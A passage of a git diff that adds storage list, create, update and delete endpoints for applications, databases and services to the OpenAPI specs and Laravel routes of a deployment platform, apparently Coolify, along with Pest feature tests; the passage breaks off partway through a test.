+                                        "type": "integer",
+                                        "description": "The ID of the storage (deprecated, use uuid instead)."
+                                    },
+                                    "type": {
+                                        "type": "string",
+                                        "enum": [
+                                            "persistent",
+                                            "file"
+                                        ],
+                                        "description": "The type of storage: persistent or file."
+                                    },
+                                    "is_preview_suffix_enabled": {
+                                        "type": "boolean",
+                                        "description": "Whether to add -pr-N suffix for preview deployments."
+                                    },
+                                    "name": {
+                                        "type": "string",
+                                        "description": "The volume name (persistent only, not allowed for read-only storages)."
+                                    },
+                                    "mount_path": {
+                                        "type": "string",
+                                        "description": "The container mount path (not allowed for read-only storages)."
+                                    },
+                                    "host_path": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The host path (persistent only, not allowed for read-only storages)."
+                                    },
+                                    "content": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The file content (file only, not allowed for read-only storages)."
+                                    }
+                                },
+                                "type": "object",
+                                "additionalProperties": false
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "200": {
+                        "description": "Storage updated.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
+        "\/databases\/{uuid}\/storages\/{storage_uuid}": {
+            "delete": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "Delete Storage",
+                "description": "Delete a persistent storage or file storage by database UUID.",
+                "operationId": "delete-storage-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    },
+                    {
+                        "name": "storage_uuid",
+                        "in": "path",
+                        "description": "UUID of the storage.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "Storage deleted.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "message": {
+                                            "type": "string"
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
         "\/deployments": {
             "get": {
                 "tags": [
@@ -11238,6 +11731,338 @@
                 ]
             }
         },
+        "\/services\/{uuid}\/storages": {
+            "get": {
+                "tags": [
+                    "Services"
+                ],
+                "summary": "List Storages",
+                "description": "List all persistent storages and file storages by service UUID.",
+                "operationId": "list-storages-by-service-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the service.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "All storages by service UUID.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "persistent_storages": {
+                                            "type": "array",
+                                            "items": {
+                                                "type": "object"
+                                            }
+                                        },
+                                        "file_storages": {
+                                            "type": "array",
+                                            "items": {
+                                                "type": "object"
+                                            }
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
+            "post": {
+                "tags": [
+                    "Services"
+                ],
+                "summary": "Create Storage",
+                "description": "Create a persistent storage or file storage for a service sub-resource.",
+                "operationId": "create-storage-by-service-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the service.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "type",
+                                    "mount_path",
+                                    "resource_uuid"
+                                ],
+                                "properties": {
+                                    "type": {
+                                        "type": "string",
+                                        "enum": [
+                                            "persistent",
+                                            "file"
+                                        ],
+                                        "description": "The type of storage."
+                                    },
+                                    "resource_uuid": {
+                                        "type": "string",
+                                        "description": "UUID of the service application or database sub-resource."
+                                    },
+                                    "name": {
+                                        "type": "string",
+                                        "description": "Volume name (persistent only, required for persistent)."
+                                    },
+                                    "mount_path": {
+                                        "type": "string",
+                                        "description": "The container mount path."
+                                    },
+                                    "host_path": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The host path (persistent only, optional)."
+                                    },
+                                    "content": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "File content (file only, optional)."
+                                    },
+                                    "is_directory": {
+                                        "type": "boolean",
+                                        "description": "Whether this is a directory mount (file only, default false)."
+                                    },
+                                    "fs_path": {
+                                        "type": "string",
+                                        "description": "Host directory path (required when is_directory is true)."
+                                    }
+                                },
+                                "type": "object",
+                                "additionalProperties": false
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "201": {
+                        "description": "Storage created.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
+            "patch": {
+                "tags": [
+                    "Services"
+                ],
+                "summary": "Update Storage",
+                "description": "Update a persistent storage or file storage by service UUID.",
+                "operationId": "update-storage-by-service-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the service.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "description": "Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.",
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "type"
+                                ],
+                                "properties": {
+                                    "uuid": {
+                                        "type": "string",
+                                        "description": "The UUID of the storage (preferred)."
+                                    },
+                                    "id": {
+                                        "type": "integer",
+                                        "description": "The ID of the storage (deprecated, use uuid instead)."
+                                    },
+                                    "type": {
+                                        "type": "string",
+                                        "enum": [
+                                            "persistent",
+                                            "file"
+                                        ],
+                                        "description": "The type of storage: persistent or file."
+                                    },
+                                    "is_preview_suffix_enabled": {
+                                        "type": "boolean",
+                                        "description": "Whether to add -pr-N suffix for preview deployments."
+                                    },
+                                    "name": {
+                                        "type": "string",
+                                        "description": "The volume name (persistent only, not allowed for read-only storages)."
+                                    },
+                                    "mount_path": {
+                                        "type": "string",
+                                        "description": "The container mount path (not allowed for read-only storages)."
+                                    },
+                                    "host_path": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The host path (persistent only, not allowed for read-only storages)."
+                                    },
+                                    "content": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The file content (file only, not allowed for read-only storages)."
+                                    }
+                                },
+                                "type": "object",
+                                "additionalProperties": false
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "200": {
+                        "description": "Storage updated.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
+        "\/services\/{uuid}\/storages\/{storage_uuid}": {
+            "delete": {
+                "tags": [
+                    "Services"
+                ],
+                "summary": "Delete Storage",
+                "description": "Delete a persistent storage or file storage by service UUID.",
+                "operationId": "delete-storage-by-service-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the service.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    },
+                    {
+                        "name": "storage_uuid",
+                        "in": "path",
+                        "description": "UUID of the storage.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "Storage deleted.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "message": {
+                                            "type": "string"
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
         "\/teams": {
             "get": {
                 "tags": [
diff --git a/openapi.yaml b/openapi.yaml
index 7064be28a..93038ce80 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2204,6 +2204,73 @@ paths:
       security:
         -
           bearerAuth: []
+    post:
+      tags:
+        - Applications
+      summary: 'Create Storage'
+      description: 'Create a persistent storage or file storage for an application.'
+      operationId: create-storage-by-application-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the application.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - type
+                - mount_path
+              properties:
+                type:
+                  type: string
+                  enum: [persistent, file]
+                  description: 'The type of storage.'
+                name:
+                  type: string
+                  description: 'Volume name (persistent only, required for persistent).'
+                mount_path:
+                  type: string
+                  description: 'The container mount path.'
+                host_path:
+                  type: string
+                  nullable: true
+                  description: 'The host path (persistent only, optional).'
+                content:
+                  type: string
+                  nullable: true
+                  description: 'File content (file only, optional).'
+                is_directory:
+                  type: boolean
+                  description: 'Whether this is a directory mount (file only, default false).'
+                fs_path:
+                  type: string
+                  description: 'Host directory path (required when is_directory is true).'
+              type: object
+              additionalProperties: false
+      responses:
+        '201':
+          description: 'Storage created.'
+          content:
+            application/json:
+              schema:
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
     patch:
       tags:
         - Applications
@@ -2225,12 +2292,14 @@ paths:
           application/json:
             schema:
               required:
-                - id
                 - type
               properties:
+                uuid:
+                  type: string
+                  description: 'The UUID of the storage (preferred).'
                 id:
                   type: integer
-                  description: 'The ID of the storage.'
+                  description: 'The ID of the storage (deprecated, use uuid instead).'
                 type:
                   type: string
                   enum: [persistent, file]
@@ -2272,6 +2341,48 @@ paths:
       security:
         -
           bearerAuth: []
+  '/applications/{uuid}/storages/{storage_uuid}':
+    delete:
+      tags:
+        - Applications
+      summary: 'Delete Storage'
+      description: 'Delete a persistent storage or file storage by application UUID.'
+      operationId: delete-storage-by-application-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the application.'
+          required: true
+          schema:
+            type: string
+        -
+          name: storage_uuid
+          in: path
+          description: 'UUID of the storage.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'Storage deleted.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  message: { type: string }
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
   /cloud-tokens:
     get:
       tags:
@@ -4209,6 +4320,219 @@ paths:
       security:
         -
           bearerAuth: []
+  '/databases/{uuid}/storages':
+    get:
+      tags:
+        - Databases
+      summary: 'List Storages'
+      description: 'List all persistent storages and file storages by database UUID.'
+      operationId: list-storages-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'All storages by database UUID.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  persistent_storages: { type: array, items: { type: object } }
+                  file_storages: { type: array, items: { type: object } }
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+      security:
+        -
+          bearerAuth: []
+    post:
+      tags:
+        - Databases
+      summary: 'Create Storage'
+      description: 'Create a persistent storage or file storage for a database.'
+      operationId: create-storage-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - type
+                - mount_path
+              properties:
+                type:
+                  type: string
+                  enum: [persistent, file]
+                  description: 'The type of storage.'
+                name:
+                  type: string
+                  description: 'Volume name (persistent only, required for persistent).'
+                mount_path:
+                  type: string
+                  description: 'The container mount path.'
+                host_path:
+                  type: string
+                  nullable: true
+                  description: 'The host path (persistent only, optional).'
+                content:
+                  type: string
+                  nullable: true
+                  description: 'File content (file only, optional).'
+                is_directory:
+                  type: boolean
+                  description: 'Whether this is a directory mount (file only, default false).'
+                fs_path:
+                  type: string
+                  description: 'Host directory path (required when is_directory is true).'
+              type: object
+              additionalProperties: false
+      responses:
+        '201':
+          description: 'Storage created.'
+          content:
+            application/json:
+              schema:
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
+    patch:
+      tags:
+        - Databases
+      summary: 'Update Storage'
+      description: 'Update a persistent storage or file storage by database UUID.'
+      operationId: update-storage-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        description: 'Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.'
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - type
+              properties:
+                uuid:
+                  type: string
+                  description: 'The UUID of the storage (preferred).'
+                id:
+                  type: integer
+                  description: 'The ID of the storage (deprecated, use uuid instead).'
+                type:
+                  type: string
+                  enum: [persistent, file]
+                  description: 'The type of storage: persistent or file.'
+                is_preview_suffix_enabled:
+                  type: boolean
+                  description: 'Whether to add -pr-N suffix for preview deployments.'
+                name:
+                  type: string
+                  description: 'The volume name (persistent only, not allowed for read-only storages).'
+                mount_path:
+                  type: string
+                  description: 'The container mount path (not allowed for read-only storages).'
+                host_path:
+                  type: string
+                  nullable: true
+                  description: 'The host path (persistent only, not allowed for read-only storages).'
+                content:
+                  type: string
+                  nullable: true
+                  description: 'The file content (file only, not allowed for read-only storages).'
+              type: object
+              additionalProperties: false
+      responses:
+        '200':
+          description: 'Storage updated.'
+          content:
+            application/json:
+              schema:
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
+  '/databases/{uuid}/storages/{storage_uuid}':
+    delete:
+      tags:
+        - Databases
+      summary: 'Delete Storage'
+      description: 'Delete a persistent storage or file storage by database UUID.'
+      operationId: delete-storage-by-database-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the database.'
+          required: true
+          schema:
+            type: string
+        -
+          name: storage_uuid
+          in: path
+          description: 'UUID of the storage.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'Storage deleted.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  message: { type: string }
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
   /deployments:
     get:
       tags:
@@ -7070,6 +7394,223 @@ paths:
       security:
         -
           bearerAuth: []
+  '/services/{uuid}/storages':
+    get:
+      tags:
+        - Services
+      summary: 'List Storages'
+      description: 'List all persistent storages and file storages by service UUID.'
+      operationId: list-storages-by-service-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the service.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'All storages by service UUID.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  persistent_storages: { type: array, items: { type: object } }
+                  file_storages: { type: array, items: { type: object } }
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+      security:
+        -
+          bearerAuth: []
+    post:
+      tags:
+        - Services
+      summary: 'Create Storage'
+      description: 'Create a persistent storage or file storage for a service sub-resource.'
+      operationId: create-storage-by-service-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the service.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - type
+                - mount_path
+                - resource_uuid
+              properties:
+                type:
+                  type: string
+                  enum: [persistent, file]
+                  description: 'The type of storage.'
+                resource_uuid:
+                  type: string
+                  description: 'UUID of the service application or database sub-resource.'
+                name:
+                  type: string
+                  description: 'Volume name (persistent only, required for persistent).'
+                mount_path:
+                  type: string
+                  description: 'The container mount path.'
+                host_path:
+                  type: string
+                  nullable: true
+                  description: 'The host path (persistent only, optional).'
+                content:
+                  type: string
+                  nullable: true
+                  description: 'File content (file only, optional).'
+                is_directory:
+                  type: boolean
+                  description: 'Whether this is a directory mount (file only, default false).'
+                fs_path:
+                  type: string
+                  description: 'Host directory path (required when is_directory is true).'
+              type: object
+              additionalProperties: false
+      responses:
+        '201':
+          description: 'Storage created.'
+          content:
+            application/json:
+              schema:
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
+    patch:
+      tags:
+        - Services
+      summary: 'Update Storage'
+      description: 'Update a persistent storage or file storage by service UUID.'
+      operationId: update-storage-by-service-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the service.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        description: 'Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.'
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - type
+              properties:
+                uuid:
+                  type: string
+                  description: 'The UUID of the storage (preferred).'
+                id:
+                  type: integer
+                  description: 'The ID of the storage (deprecated, use uuid instead).'
+                type:
+                  type: string
+                  enum: [persistent, file]
+                  description: 'The type of storage: persistent or file.'
+                is_preview_suffix_enabled:
+                  type: boolean
+                  description: 'Whether to add -pr-N suffix for preview deployments.'
+                name:
+                  type: string
+                  description: 'The volume name (persistent only, not allowed for read-only storages).'
+                mount_path:
+                  type: string
+                  description: 'The container mount path (not allowed for read-only storages).'
+                host_path:
+                  type: string
+                  nullable: true
+                  description: 'The host path (persistent only, not allowed for read-only storages).'
+                content:
+                  type: string
+                  nullable: true
+                  description: 'The file content (file only, not allowed for read-only storages).'
+              type: object
+              additionalProperties: false
+      responses:
+        '200':
+          description: 'Storage updated.'
+          content:
+            application/json:
+              schema:
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
+  '/services/{uuid}/storages/{storage_uuid}':
+    delete:
+      tags:
+        - Services
+      summary: 'Delete Storage'
+      description: 'Delete a persistent storage or file storage by service UUID.'
+      operationId: delete-storage-by-service-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the service.'
+          required: true
+          schema:
+            type: string
+        -
+          name: storage_uuid
+          in: path
+          description: 'UUID of the storage.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'Storage deleted.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  message: { type: string }
+                type: object
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
+      security:
+        -
+          bearerAuth: []
   /teams:
     get:
       tags:
diff --git a/routes/api.php b/routes/api.php
index 1de365c49..0d3edcced 100644
--- a/routes/api.php
+++ b/routes/api.php
@@ -121,7 +121,9 @@
     Route::delete('/applications/{uuid}/envs/{env_uuid}', [ApplicationsController::class, 'delete_env_by_uuid'])->middleware(['api.ability:write']);
     Route::get('/applications/{uuid}/logs', [ApplicationsController::class, 'logs_by_uuid'])->middleware(['api.ability:read']);
     Route::get('/applications/{uuid}/storages', [ApplicationsController::class, 'storages'])->middleware(['api.ability:read']);
+    Route::post('/applications/{uuid}/storages', [ApplicationsController::class, 'create_storage'])->middleware(['api.ability:write']);
     Route::patch('/applications/{uuid}/storages', [ApplicationsController::class, 'update_storage'])->middleware(['api.ability:write']);
+    Route::delete('/applications/{uuid}/storages/{storage_uuid}', [ApplicationsController::class, 'delete_storage'])->middleware(['api.ability:write']);
 
     Route::match(['get', 'post'], '/applications/{uuid}/start', [ApplicationsController::class, 'action_deploy'])->middleware(['api.ability:deploy']);
     Route::match(['get', 'post'], '/applications/{uuid}/restart', [ApplicationsController::class, 'action_restart'])->middleware(['api.ability:deploy']);
@@ -154,6 +156,11 @@
     Route::delete('/databases/{uuid}/backups/{scheduled_backup_uuid}', [DatabasesController::class, 'delete_backup_by_uuid'])->middleware(['api.ability:write']);
     Route::delete('/databases/{uuid}/backups/{scheduled_backup_uuid}/executions/{execution_uuid}', [DatabasesController::class, 'delete_execution_by_uuid'])->middleware(['api.ability:write']);
 
+    Route::get('/databases/{uuid}/storages', [DatabasesController::class, 'storages'])->middleware(['api.ability:read']);
+    Route::post('/databases/{uuid}/storages', [DatabasesController::class, 'create_storage'])->middleware(['api.ability:write']);
+    Route::patch('/databases/{uuid}/storages', [DatabasesController::class, 'update_storage'])->middleware(['api.ability:write']);
+    Route::delete('/databases/{uuid}/storages/{storage_uuid}', [DatabasesController::class, 'delete_storage'])->middleware(['api.ability:write']);
+
     Route::get('/databases/{uuid}/envs', [DatabasesController::class, 'envs'])->middleware(['api.ability:read']);
     Route::post('/databases/{uuid}/envs', [DatabasesController::class, 'create_env'])->middleware(['api.ability:write']);
     Route::patch('/databases/{uuid}/envs/bulk', [DatabasesController::class, 'create_bulk_envs'])->middleware(['api.ability:write']);
@@ -171,6 +178,11 @@
     Route::patch('/services/{uuid}', [ServicesController::class, 'update_by_uuid'])->middleware(['api.ability:write']);
     Route::delete('/services/{uuid}', [ServicesController::class, 'delete_by_uuid'])->middleware(['api.ability:write']);
 
+    Route::get('/services/{uuid}/storages', [ServicesController::class, 'storages'])->middleware(['api.ability:read']);
+    Route::post('/services/{uuid}/storages', [ServicesController::class, 'create_storage'])->middleware(['api.ability:write']);
+    Route::patch('/services/{uuid}/storages', [ServicesController::class, 'update_storage'])->middleware(['api.ability:write']);
+    Route::delete('/services/{uuid}/storages/{storage_uuid}', [ServicesController::class, 'delete_storage'])->middleware(['api.ability:write']);
+
     Route::get('/services/{uuid}/envs', [ServicesController::class, 'envs'])->middleware(['api.ability:read']);
     Route::post('/services/{uuid}/envs', [ServicesController::class, 'create_env'])->middleware(['api.ability:write']);
     Route::patch('/services/{uuid}/envs/bulk', [ServicesController::class, 'create_bulk_envs'])->middleware(['api.ability:write']);
diff --git a/tests/Feature/GenerateApplicationNameTest.php b/tests/Feature/GenerateApplicationNameTest.php
new file mode 100644
index 000000000..3a1c475d3
--- /dev/null
+++ b/tests/Feature/GenerateApplicationNameTest.php
@@ -0,0 +1,22 @@
+<?php
+
+test('generate_application_name strips owner from git repository', function () {
+    $name = generate_application_name('coollabsio/coolify', 'main', 'test123');
+
+    expect($name)->toBe('coolify:main-test123');
+    expect($name)->not->toContain('coollabsio');
+});
+
+test('generate_application_name handles repository without owner', function () {
+    $name = generate_application_name('coolify', 'main', 'test123');
+
+    expect($name)->toBe('coolify:main-test123');
+});
+
+test('generate_application_name handles deeply nested repository path', function () {
+    $name = generate_application_name('org/sub/repo-name', 'develop', 'abc456');
+
+    expect($name)->toBe('repo-name:develop-abc456');
+    expect($name)->not->toContain('org');
+    expect($name)->not->toContain('sub');
+});
diff --git a/tests/Feature/StorageApiTest.php b/tests/Feature/StorageApiTest.php
new file mode 100644
index 000000000..75357e41e
--- /dev/null
+++ b/tests/Feature/StorageApiTest.php
@@ -0,0 +1,379 @@
+<?php
+
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\InstanceSettings;
+use App\Models\LocalFileVolume;
+use App\Models\LocalPersistentVolume;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\StandalonePostgresql;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Bus;
+use Illuminate\Support\Str;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    Bus::fake();
+    InstanceSettings::updateOrCreate(['id' => 0]);
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $plainTextToken = Str::random(40);
+    $token = $this->user->tokens()->create([
+        'name' => 'test-token',
+        'token' => hash('sha256', $plainTextToken),
+        'abilities' => ['*'],
+        'team_id' => $this->team->id,
+    ]);
+    $this->bearerToken = $token->getKey().'|'.$plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+function createTestApplication($context): Application
+{
+    return Application::factory()->create([
+        'environment_id' => $context->environment->id,
+    ]);
+}
+
+function createTestDatabase($context): StandalonePostgresql
+{
+    return StandalonePostgresql::create([
+        'name' => 'test-postgres',
+        'image' => 'postgres:15-alpine',
+        'postgres_user' => 'postgres',
+        'postgres_password' => 'password',
+        'postgres_db' => 'postgres',
+        'environment_id' => $context->environment->id,
+        'destination_id' => $context->destination->id,
+        'destination_type' => $context->destination->getMorphClass(),
+    ]);
+}
+
+// ──────────────────────────────────────────────────────────────
+// Application Storage Endpoints
+// ──────────────────────────────────────────────────────────────
+
+describe('GET /api/v1/applications/{uuid}/storages', function () {
+    test('lists storages for an application', function () {
+        $app = createTestApplication($this);
+
+        LocalPersistentVolume::create([
+            'name' => $app->uuid.'-test-vol',
+            'mount_path' => '/data',
+            'resource_id' => $app->id,
+            'resource_type' => $app->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->getJson("/api/v1/applications/{$app->uuid}/storages");
+
+        $response->assertStatus(200);
+        $response->assertJsonCount(1, 'persistent_storages');
+        $response->assertJsonCount(0, 'file_storages');
+    });
+
+    test('returns 404 for non-existent application', function () {
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->getJson('/api/v1/applications/non-existent-uuid/storages');
+
+        $response->assertStatus(404);
+    });
+});
+
+describe('POST /api/v1/applications/{uuid}/storages', function () {
+    test('creates a persistent storage', function () {
+        $app = createTestApplication($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/applications/{$app->uuid}/storages", [
+            'type' => 'persistent',
+            'name' => 'my-volume',
+            'mount_path' => '/data',
+        ]);
+
+        $response->assertStatus(201);
+
+        $vol = LocalPersistentVolume::where('resource_id', $app->id)
+            ->where('resource_type', $app->getMorphClass())
+            ->first();
+
+        expect($vol)->not->toBeNull();
+        expect($vol->name)->toBe($app->uuid.'-my-volume');
+        expect($vol->mount_path)->toBe('/data');
+        expect($vol->uuid)->not->toBeNull();
+    });
+
+    test('creates a file storage', function () {
+        $app = createTestApplication($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/applications/{$app->uuid}/storages", [
+            'type' => 'file',
+            'mount_path' => '/app/config.json',
+            'content' => '{"key": "value"}',
+        ]);
+
+        $response->assertStatus(201);
+
+        $vol = LocalFileVolume::where('resource_id', $app->id)
+            ->where('resource_type', get_class($app))
+            ->first();
+
+        expect($vol)->not->toBeNull();
+        expect($vol->mount_path)->toBe('/app/config.json');
+        expect($vol->is_directory)->toBeFalse();
+    });
+
+    test('rejects persistent storage without name', function () {
+        $app = createTestApplication($this);
+
